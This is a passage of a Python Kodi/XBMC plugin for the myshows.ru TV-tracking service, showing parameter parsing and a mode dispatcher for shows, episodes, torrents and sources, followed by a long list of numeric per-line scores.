data[\"title\"]=data[\"title\"].strip()\n", " # kinorate(data['title'],data['year'])\n", "\n", " #data={\"year\": \"2013\", \"titleAlt\": \"\\u041f\\u0440\\u043e\\u043a\\u043b\\u044f\\u0442\\u0438\\u0435 \\u043c\\u0443\\u043b\\u044c\\u0442\\u0438\\u0432\\u044b\\u0431\\u043e\\u0440\\u0430 \\u043f\\u0440\\u0435\\u0432\\u0440\\u0430\\u0442\\u0438\\u043b\\u043e \\u043c\\u043e\\u044e \\u0436\\u0438\\u0437\\u043d\\u044c \\u0432 \\u0430\\u0434\", \"title\": \"Ore no N\\u014dnai Sentakushi ga, Gakuen Love Come o Zenryoku de Jama S\"}\n", " #kinorate(data['title'],data['year'],titleAlt=data['titleAlt'])\n", " #kinorate('Мальчишник Часть 3',2013)\n", " #RateShow(24199).count()\n", " #Rate('24199', '0',None)\n", " #title='{\"tvshowid\": 35, \"episode\": 9, \"season\": 1, \"tvdb_id\": \"79044\", \"episodeid\": 964, \"label\": \"That Brooch Was So Heavy\", \"uniqueid\": {\"unknown\": \"305749\"}, \"year\": 2005, \"showtitle\": \"Honey and Clover\"}'\n", " #title='{\"tvshowid\": 35, \"episode\": 9, \"season\": 1, \"tvdb_id\": \"79044\", \"episodeid\": 964, \"label\": \"That Brooch Was So Heavy\", \"uniqueid\": {\"unknown\": \"305749\"}, \"year\": 2005, \"showtitle\": \"Интерны\"}'\n", " title='{\"tvshowid\": 51, \"episode\": 10, \"uniqueid\": {\"unknown\": \"4606529\"}, \"season\": 1, \"tvdb_id\": \"269877\", \"episodeid\": 1204, \"label\": \"The Best of the Student Council (Photos)\", \"file\": \"smb://192.168.0.2/xbmc_seriez/Love Lab/Season 1/Love.Lab.S01E10.mkv\", \"year\": 2013, \"showtitle\": \"Love Lab\"}'\n", " #try:\n", " # SyncXBMC(title).doaction()\n", " #except ValueError or AttributeError:\n", " # FakeRate(title)\n", " #FakeRate(title)\n", " #WatchedDB().onaccess()\n", " folder=u'D:\\\\seriez\\\\xxx1и\\\\'\n", " folder=folder.encode('utf-8','ignore')\n", " subtitledirs=xbmcvfs.listdir(folder)[0]\n", " for d in subtitledirs:\n", " for x in xbmcvfs.listdir(folder+os.sep+d)[0]:\n", " subtitledirs.append(d+os.sep+x)\n", " if len(subtitledirs)>0:\n", " subtitledirs.insert(0,__language__(30505))\n", " ret = xbmcgui.Dialog().select(__language__(30506), subtitledirs)\n", "\n", "params = get_params()\n", "try: apps=get_apps()\n", "except: pass\n", "\n", "\n", "showId = None\n", "title = None\n", "mode = None\n", "seasonNumber = None\n", "id = None\n", "action = None\n", "playcount = None\n", "sort = None\n", "episodeId = None\n", "refresh_url = None\n", "stringdata = None\n", "\n", "\n", "try: title = urllib.unquote_plus(params['title'])\n", "except: pass\n", "try: showId = urllib.unquote_plus(params['showId'])\n", "except: pass\n", "try: seasonNumber = urllib.unquote_plus(params['seasonNumber'])\n", "except: pass\n", "try: mode = int(params['mode'])\n", "except: pass\n", "try: mode = int(apps['mode'])\n", "except: pass\n", "try: id = urllib.unquote_plus(str(params['id']))\n", "except: pass\n", "try: episodeId = urllib.unquote_plus(str(params['episodeId']))\n", "except: pass\n", "try: playcount = str(params['playcount'])\n", "except: pass\n", "try: action = urllib.unquote_plus(params['action'])\n", "except: pass\n", "try: sort = str(params['sort'])\n", "except: pass\n", "try: refresh_url = urllib.unquote_plus(params['refresh_url'])\n", "except: pass\n", "try: stringdata = urllib.unquote_plus(params['stringdata'])\n", "except: pass\n", "\n", "try: title = urllib.unquote_plus(apps['title'])\n", "except: pass\n", "try: showId = str(urllib.unquote_plus(apps['argv']['showId']))\n", "except: pass\n", "try: seasonNumber = str(urllib.unquote_plus(apps['argv']['seasonNumber']))\n", "except: pass\n", "try: mode = int(apps['mode'])\n", "except: pass\n", "try: id = urllib.unquote_plus(str(apps['argv']['id']))\n", "except: pass\n", "try: episodeId = urllib.unquote_plus(str(apps['argv']['episodeId']))\n", "except: pass\n", "try: playcount = str(apps['argv']['playcount'])\n", "except: pass\n", "try: action = urllib.unquote_plus(apps['argv']['action'])\n", "except: pass\n", "try: sort = str(apps['argv']['sort'])\n", "except: pass\n", "try: refresh_url = urllib.unquote_plus(apps['argv']['refresh_url'])\n", "except: pass\n", "try: stringdata = urllib.unquote_plus(apps['argv']['stringdata'])\n", "except: pass\n", "\n", "if mode == None:\n", " Main()\n", "elif mode==1:\n", " import shutil\n", " ru=os.path.join(__addonpath__, u'resources',u'language',u'Russian')\n", " en=os.path.join(__addonpath__, u'resources',u'language',u'English')\n", " shutil.move(os.path.join(en, u'strings.xml'), os.path.join(en, u'old_strings.xml'))\n", " shutil.copy(os.path.join(ru, u'strings.xml'), en)\n", " showMessage(__language__(30208), __language__(30533))\n", "elif mode >= 10 and mode <19:\n", " Shows()\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n", "elif mode == 19:\n", " Shows()\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_RATING)\n", "elif mode == 20:\n", " Seasons(showId)\n", "elif mode == 25:\n", " Episodes(showId, seasonNumber)\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_EPISODE)\n", "elif mode == 27:\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE)\n", " if not sort:\n", " EpisodeList('unwatched')\n", " else:\n", " ShowList('unwatched')\n", "elif mode == 28:\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE)\n", " if not sort:\n", " EpisodeList('next')\n", " else:\n", " ShowList('next')\n", "elif mode == 30:\n", " EpisodeMenu(id, playcount, refresh_url)\n", "elif mode == 40:\n", " FriendsNews()\n", "elif mode == 41:\n", " if action==None: action=login\n", " if sort==None: sort='profile'\n", " Profile(action, sort)\n", "elif mode == 50:\n", " MyTorrents()\n", "elif mode == 51:\n", " MyScanList()\n", "elif mode == 52:\n", " uTorrentBrowser()\n", "elif mode == 60:\n", " ClearCache()\n", "elif mode == 61:\n", " PluginStatus().menu()\n", "elif mode == 62:\n", " ExtraFunction()\n", "elif mode == 70:\n", " #if 1==0:\n", " try:\n", " SyncXBMC(title).doaction()\n", " Debug('[mode 70]: SyncXBMC(title).doaction() success')\n", " except ValueError or AttributeError:\n", " Debug('[mode 70]: ValueError or AttributeError, start FakeRate for %s' % (title))\n", " if action=='check':\n", " FakeRate(title)\n", "elif mode == 71:\n", " try:\n", " get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/')\n", " WatchedDB().onaccess()\n", " except:\n", " showMessage(__language__(30520),__language__(30532))\n", "elif mode in (2571,5171,302071,3071):\n", " MoveToXBMC()\n", "elif mode == 610:\n", " PluginStatus().install(action)\n", "elif mode == 611:\n", " PluginStatus().install_plugin(action)\n", "elif mode == 100:\n", " if not action: action='all'\n", " TopShows(action)\n", "elif mode == 200:\n", " Change_Status_Show(showId, action, refresh_url)\n", "elif mode in (206,256,306):\n", " xbmc.executebuiltin(\"Action(Info)\")\n", "elif mode == 250:\n", " Change_Status_Season(showId, seasonNumber, action, refresh_url)\n", "elif mode in (251,201,302):\n", " Rate(showId, id, refresh_url)\n", "elif mode == 300:\n", " Change_Status_Episode(showId, id, action, playcount, refresh_url)\n", "elif mode == 3000 or mode == 2500:\n", " VKSearch(showId, id)\n", "elif mode == 3010:\n", " Source().addsource()\n", " jdata=get_apps(stringdata)\n", " #Debug('[Input]'+str((jdata,action,sort)))\n", " if not sort:AskPlay()\n", " elif sort=='activate':\n", " if action!='silent': gotoCheckPoint()\n", " if action=='download' or action=='silent':\n", " DownloadSource()\n", " elif not jdata['id']:\n", " ScanSource().scanone()\n", "elif mode == 3011:\n", " Source().addjson()\n", "elif mode == 3012:\n", " Serialu().add()\n", "elif mode == 3013:\n", " gotoCheckPoint()\n", "elif mode == 3020:\n", " PlayFile()\n", "elif mode == 3090:\n", " AskPlay()\n", "elif mode == 301 or mode == 252:\n", " Favorite(id, refresh_url)\n", "elif mode in (500,258):\n", " DeleteSourses()\n", "elif mode == 510:\n", " ScanAll()\n", "elif mode in (30202,259):\n", " ScanSource().scanone()\n", "elif mode == 302001:\n", " ScanSource().add()\n", "elif mode == 302002:\n", " ScanSource().delete()\n", "elif mode in (30200,257):\n", " DeleteSource()\n", "elif mode in (30201,25201):\n", " DownloadSource(stringdata)\n", "elif mode == 303 or mode==203 or mode==253:\n", " AddSource()\n", "elif mode == 304 or mode==204 or mode==254:\n", " PlaySource()\n", "elif mode in (205,255):\n", " ontop('update', stringdata)\n", "elif mode == 999:\n", " Test()\n", "\n", "xbmcplugin.endOfDirectory(int(sys.argv[1]))" ]
[ 0, 0, 0.024390243902439025, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0.024390243902439025, 0.017543859649122806, 0.0196078431372549, 0.030303030303030304, 0, 0.02040816326530612, 0.02857142857142857, 0.020833333333333332, 0.014925373134328358, 0.02197802197802198, 0.017543859649122806, 0.017094017094017096, 0, 0, 0, 0, 0.043478260869565216, 0, 0.047619047619047616, 0, 0.047619047619047616, 0.017543859649122806, 0.05, 0.02631578947368421, 0.03571428571428571, 0.06956521739130435, 0.06956521739130435, 0.06956521739130435, 0.06956521739130435, 0.05982905982905983, 0.0603448275862069, 0.05333333333333334, 0, 0.06956521739130435, 0.06060606060606061, 0.06363636363636363, 0.06422018348623854, 0.06422018348623854, 0.06306306306306306, 0.018867924528301886, 0.05, 0, 0.017857142857142856, 0, 0, 0, 0, 0, 0.05405405405405406, 0.06382978723404255, 0.012195121951219513, 0, 0.037037037037037035, 0, 0.047619047619047616, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.04285714285714286, 0, 0, 0, 0.07692307692307693, 0.06666666666666667, 0.10714285714285714, 0, 0, 0.045454545454545456, 0.058823529411764705, 0, 0.02, 0, 0, 0.015384615384615385, 0.01818181818181818, 0, 0, 0, 0.014084507042253521, 0, 0.047619047619047616, 0, 0, 0.058823529411764705, 0, 0.041666666666666664, 0.009708737864077669, 0.09090909090909091, 0, 0, 0.058823529411764705, 0.07407407407407407, 0.06172839506172839, 0.06172839506172839, 0.06172839506172839, 0.06172839506172839, 0.07317073170731707, 0.041666666666666664, 0.039473684210526314, 0, 0, 0.022727272727272728, 0.021739130434782608, 0, 0, 0, 0.04, 0.017857142857142856, 0.01694915254237288, 0, 0.024390243902439025, 0, 0.07894736842105263, 0.028368794326241134, 0, 0.025974025974025976, 0, 0.028985507246376812, 0, 0.027777777777777776, 0, 0.0273972602739726, 0, 0, 0.047619047619047616, 0.02, 0, 0.02, 0.02564102564102564, 0, 0.00847457627118644, 0.025974025974025976, 0, 0.011494252873563218, 0.12903225806451613, 0.02531645569620253, 0.03389830508474576, 0.06818181818181818, 0.02127659574468085, 0.008547008547008548, 0.0125, 0.009615384615384616, 0, 0.047619047619047616, 0.014925373134328358, 0.06666666666666667, 0.10714285714285714, 0, 0.037037037037037035, 0, 0, 0.01694915254237288, 0, 0, 0.020833333333333332, 0, 0.013245033112582781, 0, 0.022988505747126436, 0.03636363636363636, 0.0967741935483871, 0.0625, 0, 0.020833333333333332, 0.029850746268656716, 0, 0.05357142857142857, 0, 0.013157894736842105, 0, 0.016129032258064516, 0.01818181818181818, 0.0625, 0.007194244604316547, 0.011235955056179775, 0.061224489795918366, 0.07692307692307693, 0.0625, 0.04504504504504504, 0.13636363636363635, 0.038461538461538464, 0, 0.014285714285714285, 0, 0.016666666666666666, 0.017241379310344827, 0.05, 0, 0.012987012987012988, 0.0125, 0.009615384615384616, 0, 0.027777777777777776, 0.07692307692307693, 0.01694915254237288, 0.014084507042253521, 0.02197802197802198, 0, 0.058823529411764705, 0.09375, 0, 0.03389830508474576, 0.09090909090909091, 0.05, 0, 0.046875, 0.02, 0, 0, 0.0136986301369863, 0, 0.03125, 0, 0.015151515151515152, 0.05714285714285714, 0, 0.03125, 0.034482758620689655, 0.01744186046511628, 0.01818181818181818, 0.020202020202020204, 0.004901960784313725, 0.013888888888888888, 0, 0.009345794392523364, 0.009523809523809525, 0.008928571428571428, 0, 0, 0.011494252873563218, 0.011494252873563218, 0.012048192771084338, 0.012345679012345678, 0.010101010101010102, 0.009900990099009901, 0.024096385542168676, 0.03614457831325301, 0.014705882352941176, 0.004098360655737705, 0.023529411764705882, 0.022727272727272728, 0.022727272727272728, 0.008849557522123894, 0, 0.022222222222222223, 0.03225806451612903, 0, 0, 0, 0, 0, 0.05555555555555555, 0.05, 0.1, 0.058823529411764705, 0.041666666666666664, 0.041666666666666664, 0.047058823529411764, 0, 0.022727272727272728, 0.021739130434782608, 0, 0, 0.0136986301369863, 0, 0, 0.045454545454545456, 0.05, 0.03225806451612903, 0, 0, 0.022727272727272728, 0, 0.03571428571428571, 0.03125, 0.022727272727272728, 0.030303030303030304, 0, 0, 0.013888888888888888, 0.0379746835443038, 0.06, 0.00847457627118644, 0.021739130434782608, 0.008620689655172414, 0.05, 0.010526315789473684, 0.009523809523809525, 0, 0.08333333333333333, 0.03636363636363636, 0, 0, 0, 0.022727272727272728, 0.020833333333333332, 0.02, 0.027777777777777776, 0.019230769230769232, 0, 0.03571428571428571, 0.03125, 0.032520325203252036, 0.04, 0.02631578947368421, 0, 0.0379746835443038, 0.0375, 0.02631578947368421, 0.010309278350515464, 0.04, 0.05084745762711865, 0.006211180124223602, 0.022727272727272728, 0.008849557522123894, 0.05, 0.028901734104046242, 0, 0.05555555555555555, 0.05, 0.0136986301369863, 0, 0.03333333333333333, 0, 0.027777777777777776, 0.025, 0.022727272727272728, 0, 0.038461538461538464, 0.03571428571428571, 0.034782608695652174, 0.02127659574468085, 0.047619047619047616, 0.05405405405405406, 0.028985507246376812, 0.045454545454545456, 0.03333333333333333, 0.011235955056179775, 0.04477611940298507, 0.05454545454545454, 0.007194244604316547, 0.022727272727272728, 0.009523809523809525, 0, 0.045454545454545456, 0, 0.07692307692307693, 0.023255813953488372, 0.045454545454545456, 0.057692307692307696, 0.009523809523809525, 0.02564102564102564, 0.013333333333333334, 0.03636363636363636, 0, 0, 0.04, 0, 0, 0.0449438202247191, 0, 0.01818181818181818, 0.017241379310344827, 0, 0, 0, 0.013333333333333334, 0.015384615384615385, 0.05, 0, 0.058823529411764705, 0.09523809523809523, 0, 0, 0.02564102564102564, 0.020833333333333332, 0.0196078431372549, 0, 0.030303030303030304, 0, 0.04878048780487805, 0.03, 0.006289308176100629, 0.03225806451612903, 0.05, 0, 0.06451612903225806, 0.02127659574468085, 0.00909090909090909, 0.0125, 0.009615384615384616, 0, 0.034482758620689655, 0.06666666666666667, 0.10714285714285714, 0, 0, 0.07142857142857142, 0.021739130434782608, 0.03333333333333333, 0.04, 0.041666666666666664, 0.04, 0.014084507042253521, 0.019230769230769232, 0.013888888888888888, 0.0196078431372549, 0.017241379310344827, 0, 0.03571428571428571, 0.018518518518518517, 0.02631578947368421, 0.017857142857142856, 0.0196078431372549, 0.021352313167259787, 0, 0.125, 0, 0.07692307692307693, 0.034482758620689655, 0.12162162162162163, 0.018518518518518517, 0.03125, 0.13793103448275862, 0.014925373134328358, 0.045454545454545456, 0.06172839506172839, 0.027777777777777776, 0.06976744186046512, 0, 0.03125, 0, 0.04, 0.03225806451612903, 0.05, 0.06818181818181818, 0.02127659574468085, 0.01, 0.0125, 0.009615384615384616, 0, 0.04, 0, 0.009708737864077669, 0.030927835051546393, 0.006289308176100629, 0, 0.0136986301369863, 0.024390243902439025, 0, 0, 0, 0, 0.022727272727272728, 0, 0.01818181818181818, 0, 0.014388489208633094, 0.05084745762711865, 0, 0.018691588785046728, 0.020833333333333332, 0.0196078431372549, 0.03636363636363636, 0.03225806451612903, 0.016666666666666666, 0.012345679012345678, 0.03305785123966942, 0.015625, 0.011494252873563218, 0.011764705882352941, 0.037037037037037035, 0.04054054054054054, 0.00546448087431694, 0.014492753623188406, 0.0125, 0.008547008547008548, 0, 0.045454545454545456, 0.0136986301369863, 0.024390243902439025, 0, 0, 0, 0.05263157894736842, 0.047619047619047616, 0.045454545454545456, 0.058823529411764705, 0.05555555555555555, 0, 0, 0.022727272727272728, 0.023255813953488372, 0, 0.01818181818181818, 0, 0.014388489208633094, 0.05084745762711865, 0, 0.018691588785046728, 0.020833333333333332, 0.0196078431372549, 0.03636363636363636, 0.047619047619047616, 0.029411764705882353, 0.017543859649122806, 0.023255813953488372, 0.022727272727272728, 0.015873015873015872, 0.03278688524590164, 0, 0.0594059405940594, 0.057692307692307696, 0, 0, 0.02857142857142857, 0.016666666666666666, 0, 0.013888888888888888, 0, 0.018018018018018018, 0.034782608695652174, 0.06521739130434782, 0.013513513513513514, 0.008620689655172414, 0.0125, 0.009615384615384616, 0, 0.05263157894736842, 0.06666666666666667, 0.10714285714285714, 0.06153846153846154, 0.09523809523809523, 0.0625, 0.01694915254237288, 0, 0.0625, 0.03125, 0.009615384615384616, 0.02857142857142857, 0.013513513513513514, 0.014925373134328358, 0.02631578947368421, 0, 0.022727272727272728, 0.013513513513513514, 0.03571428571428571, 0, 0, 0.04477611940298507, 0.041666666666666664, 0.02702702702702703, 0.01818181818181818, 0, 0.018018018018018018, 0.02459016393442623, 0.04819277108433735, 0.057692307692307696, 0.02531645569620253, 0.046875, 0.02040816326530612, 0.012345679012345678, 0.023809523809523808, 0.013333333333333334, 0.009259259259259259, 0, 0.02702702702702703, 0.013333333333333334, 0.037037037037037035, 0, 0.041666666666666664, 0.058823529411764705, 0.037037037037037035, 0.03125, 0, 0.023255813953488372, 0.027777777777777776, 0, 0.022222222222222223, 0, 0.043478260869565216, 0.038461538461538464, 0.023809523809523808, 0.01904761904761905, 0.024390243902439025, 0.011363636363636364, 0.02702702702702703, 0.022222222222222223, 0.008928571428571428, 0, 0, 0.05263157894736842, 0.08333333333333333, 0.014925373134328358, 0.020833333333333332, 0.016666666666666666, 0.020202020202020204, 0.014084507042253521, 0, 0.018518518518518517, 0.0136986301369863, 0, 0.125, 0.023809523809523808, 0.019230769230769232, 0, 0.04597701149425287, 0.02631578947368421, 0.058823529411764705, 0.022727272727272728, 0.025, 0.04040404040404041, 0.057692307692307696, 0.058823529411764705, 0.03333333333333333, 0.012048192771084338, 0.03870967741935484, 0.02857142857142857, 0.04411764705882353, 0.0625, 0.0196078431372549, 0.009259259259259259, 0.022727272727272728, 0.008928571428571428, 0, 0, 0.038461538461538464, 0.03260869565217391, 0.012658227848101266, 0.024691358024691357, 0.034482758620689655, 0.0410958904109589, 0.020618556701030927, 0.009174311926605505, 0.009009009009009009, 0, 0.022222222222222223, 0.023255813953488372, 0, 0.008695652173913044, 0.02857142857142857, 0.009259259259259259, 0, 0.030303030303030304, 0.012658227848101266, 0.012048192771084338, 0, 0.011764705882352941, 0, 0.012658227848101266, 0.012048192771084338, 0, 0.011764705882352941, 0, 0, 0.03571428571428571, 0.025, 0.008695652173913044, 0.02857142857142857, 0.009615384615384616, 0, 0.022988505747126436, 0.010101010101010102, 0.09523809523809523, 0.07142857142857142, 0.06451612903225806, 0, 0.013157894736842105, 0.017543859649122806, 0.017241379310344827, 0, 0.009433962264150943, 0, 0, 0.011627906976744186, 0.0625, 0.06, 0.03571428571428571, 0, 0, 0, 0, 0.05, 0, 0, 0, 0.018867924528301886, 0.04, 0, 0.014925373134328358, 0, 0.058823529411764705, 0, 0.018867924528301886, 0.030303030303030304, 0, 0.014492753623188406, 0.01694915254237288, 0.014285714285714285, 0.05555555555555555, 0, 0, 0.017857142857142856, 0.03225806451612903, 0.021739130434782608, 0.014492753623188406, 0.03488372093023256, 0, 0.0196078431372549, 0.018867924528301886, 0.015384615384615385, 0.0625, 0.02040816326530612, 0, 0.022222222222222223, 0.037037037037037035, 0, 0, 0, 0.014925373134328358, 0, 0.037037037037037035, 0.08, 0.05, 0.022727272727272728, 0, 0.022988505747126436, 0.017241379310344827, 0.023255813953488372, 0, 0.010526315789473684, 0, 0, 0, 0.057692307692307696, 0.017857142857142856, 0, 0.015384615384615385, 0.03529411764705882, 0, 0, 0.017543859649122806, 0.029850746268656716, 0.0975609756097561, 0.02564102564102564, 0.018867924528301886, 0.04838709677419355, 0, 0, 0.047619047619047616, 0, 0.017543859649122806, 0.014492753623188406, 0.02631578947368421, 0.03225806451612903, 0, 0, 0.043478260869565216, 0.03225806451612903, 0, 0.02564102564102564, 0.02040816326530612, 0.06060606060606061, 0, 0.05555555555555555, 0.07608695652173914, 0.043478260869565216, 0.13333333333333333, 0, 0.024390243902439025, 0.03225806451612903, 0, 0, 0.03225806451612903, 0, 0.016, 0.014705882352941176, 0.018518518518518517, 0, 0.01818181818181818, 0.015625, 0.010416666666666666, 0, 0, 0.017543859649122806, 0.05, 0.019230769230769232, 0.04716981132075472, 0.018867924528301886, 0.012345679012345678, 0, 0.012195121951219513, 0, 0, 0, 0.018518518518518517, 0.05263157894736842, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0, 0.018518518518518517, 0.05263157894736842, 0.024691358024691357, 0, 0.012195121951219513, 0, 0.0392156862745098, 0.018867924528301886, 0, 0, 0, 0, 0, 0, 0, 0.017857142857142856, 0, 0.02040816326530612, 0, 0, 0, 0, 0.03571428571428571, 0.018867924528301886, 0, 0.0625, 0.03896103896103896, 0.0375, 0, 0, 0, 0, 0, 0.03, 0, 0, 0.05555555555555555, 0, 0.08771929824561403, 0.034482758620689655, 0.04878048780487805, 0, 0.03125, 0.029411764705882353, 0.03225806451612903, 0.022727272727272728, 0, 0, 0.047619047619047616, 0, 0.021739130434782608, 0, 0, 0.030303030303030304, 0, 0.024390243902439025, 0, 0, 0.0625, 0.05, 0, 0.023255813953488372, 0.0125, 0.031578947368421054, 0, 0, 0.01694915254237288, 0.0392156862745098, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0.06097560975609756, 0, 0.02, 0.014705882352941176, 0.025, 0.038461538461538464, 0.011834319526627219, 0.02702702702702703, 0.021739130434782608, 0.014925373134328358, 0.018518518518518517, 0, 0.009259259259259259, 0.013986013986013986, 0, 0.0196078431372549, 0.01818181818181818, 0.017241379310344827, 0, 0, 0.02127659574468085, 0.022222222222222223, 0.024096385542168676, 0, 0.012195121951219513, 0.016260162601626018, 0.03773584905660377, 0, 0, 0.018018018018018018, 0.017241379310344827, 0.024691358024691357, 0.018518518518518517, 0.024390243902439025, 0.02197802197802198, 0.01694915254237288, 0.024390243902439025, 0, 0.014598540145985401, 0.023809523809523808, 0.015384615384615385, 0.015873015873015872, 0.013888888888888888, 0, 0.027777777777777776, 0.017857142857142856, 0.01639344262295082, 0.0125, 0.008928571428571428, 0, 0.0125, 0.024390243902439025, 0.007194244604316547, 0, 0, 0.056338028169014086, 0.08163265306122448, 0, 0.023809523809523808, 0, 0.04, 0, 0, 0.027522935779816515, 0, 0, 0.014388489208633094, 0, 0, 0, 0, 0, 0.018691588785046728, 0.011764705882352941, 0.021052631578947368, 0, 0.013986013986013986, 0.020833333333333332, 0.04, 0.043478260869565216, 0.05263157894736842, 0, 0.010309278350515464, 0.01910828025477707, 0, 0.030303030303030304, 0.03571428571428571, 0, 0.013513513513513514, 0.045454545454545456, 0.05263157894736842, 0.05, 0, 0, 0, 0.03571428571428571, 0.02857142857142857, 0, 0, 0, 0.041666666666666664, 0.024390243902439025, 0, 0, 0, 0, 0.024390243902439025, 0, 0.015873015873015872, 0, 0.022058823529411766, 0, 0.05, 0, 0.009523809523809525, 0.015625, 0, 0.034482758620689655, 0, 0.014705882352941176, 0.05, 0.06666666666666667, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0, 0.00909090909090909, 0.044444444444444446, 0.009708737864077669, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0.018518518518518517, 0.057971014492753624, 0.125, 0.06172839506172839, 0.125, 0.044444444444444446, 0, 0, 0, 0, 0.061224489795918366, 0, 0.09090909090909091, 0.030303030303030304, 0, 0.017857142857142856, 0, 0.017241379310344827, 0, 0.017857142857142856, 0, 0.028846153846153848, 0, 0.03571428571428571, 0, 0.015625, 0, 0.016666666666666666, 0.030303030303030304, 0, 0.125, 0.015384615384615385, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0.058823529411764705, 0.015151515151515152, 0, 0, 0.038461538461538464, 0.061224489795918366, 0.015625, 0, 0, 0.016666666666666666, 0.019230769230769232, 0.012658227848101266, 0, 0.125, 0.04477611940298507, 0.04918032786885246, 0, 0, 0, 0, 0.043859649122807015, 0.03571428571428571, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0.09090909090909091, 0.030303030303030304, 0.019230769230769232, 0.018518518518518517, 0.019230769230769232, 0, 0.015625, 0, 0.018518518518518517, 0.125, 0.015384615384615385, 0, 0, 0.029411764705882353, 0, 0, 0.0136986301369863, 0, 0, 0.037037037037037035, 0, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0.03333333333333333, 0, 0, 0, 0, 0, 0.0423728813559322, 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0.125, 0, 0, 0, 0, 0, 0, 0.00303951367781155, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013513513513513514, 0, 0, 0, 0, 0, 0, 0, 0.0045871559633027525, 0, 0, 0, 0.023809523809523808, 0, 0, 0, 0, 0, 0.021739130434782608, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.058823529411764705, 0, 0, 0.011235955056179775, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04918032786885246, 0.023255813953488372, 0.05555555555555555, 0, 0, 0.0625, 0.13333333333333333, 0.008771929824561403, 0, 0.03125, 0, 0, 0, 0, 0, 0.012345679012345678, 0.035398230088495575, 0, 0, 0, 0, 0.11538461538461539, 0.03125, 0.03571428571428571, 0, 0.06521739130434782, 0.023529411764705882, 0.04, 0.03773584905660377, 0.023529411764705882, 0.04, 0.05357142857142857, 0.023529411764705882, 0, 0.06521739130434782, 0.028037383177570093, 0.02, 0.03278688524590164, 0.03773584905660377, 0.04, 0.05357142857142857, 0.023529411764705882, 0, 0.008, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02127659574468085, 0, 0, 0.03333333333333333, 0.045454545454545456, 0, 0.08333333333333333, 0, 0.05555555555555555, 0.014925373134328358, 0.014705882352941176, 0.02962962962962963, 0.07407407407407407, 0, 0.02, 0.034482758620689655, 0.03225806451612903, 0, 0.012658227848101266, 0, 0.03260869565217391, 0, 0.018518518518518517, 0, 0, 0, 0, 0, 0.04918032786885246, 0, 0.008333333333333333, 0, 0, 0, 0, 0, 0.04918032786885246, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0.0625, 0.015873015873015872, 0.021505376344086023, 0.023255813953488372, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01818181818181818, 0.03125, 0.016, 0.012658227848101266, 0.06666666666666667, 0, 0, 0, 0, 0, 0, 0.005208333333333333, 0.014705882352941176, 0.024390243902439025, 0.034482758620689655, 0.034482758620689655, 0.009345794392523364, 0.00975609756097561, 0.006578947368421052, 0.1, 0, 0.023809523809523808, 0, 0.047619047619047616, 0.03571428571428571, 0.029411764705882353, 0.046511627906976744, 0.022727272727272728, 0, 0, 0, 0.03571428571428571, 0.0196078431372549, 0, 0, 0.045454545454545456, 0.09523809523809523, 0.15384615384615385, 0, 0, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0.043478260869565216, 0, 0, 0.018867924528301886, 0.15384615384615385, 0.01818181818181818, 0.15384615384615385, 0.014925373134328358, 0.15384615384615385, 0.02857142857142857, 0.15384615384615385, 0.030303030303030304, 0.15384615384615385, 0.019230769230769232, 0.15384615384615385, 0.015151515151515152, 0.15384615384615385, 0.022222222222222223, 0.15384615384615385, 0.01818181818181818, 0.15384615384615385, 0.02857142857142857, 0.15384615384615385, 0.015384615384615385, 0.15384615384615385, 0.015873015873015872, 0.15384615384615385, 0, 0.0196078431372549, 0.15384615384615385, 0.015151515151515152, 0.15384615384615385, 0.01282051282051282, 0.15384615384615385, 0.030303030303030304, 0.15384615384615385, 0.017241379310344827, 0.15384615384615385, 0.013888888888888888, 0.15384615384615385, 0.0196078431372549, 0.15384615384615385, 0.01639344262295082, 0.15384615384615385, 0.024390243902439025, 0.15384615384615385, 0.014084507042253521, 0.15384615384615385, 0.014492753623188406, 0.15384615384615385, 0, 0.058823529411764705, 0, 0.07142857142857142, 0, 0.041666666666666664, 0.041666666666666664, 0.011363636363636364, 0, 0, 0.03333333333333333, 0, 0.009900990099009901, 0, 0, 0.00980392156862745, 0, 0, 0, 0, 0.010309278350515464, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.11764705882352941, 0.11764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0.011111111111111112, 0.03571428571428571, 0, 0, 0, 0.01282051282051282, 0, 0.08333333333333333, 0.01639344262295082, 0.07894736842105263, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0.07142857142857142, 0, 0, 0, 0, 0, 0, 0, 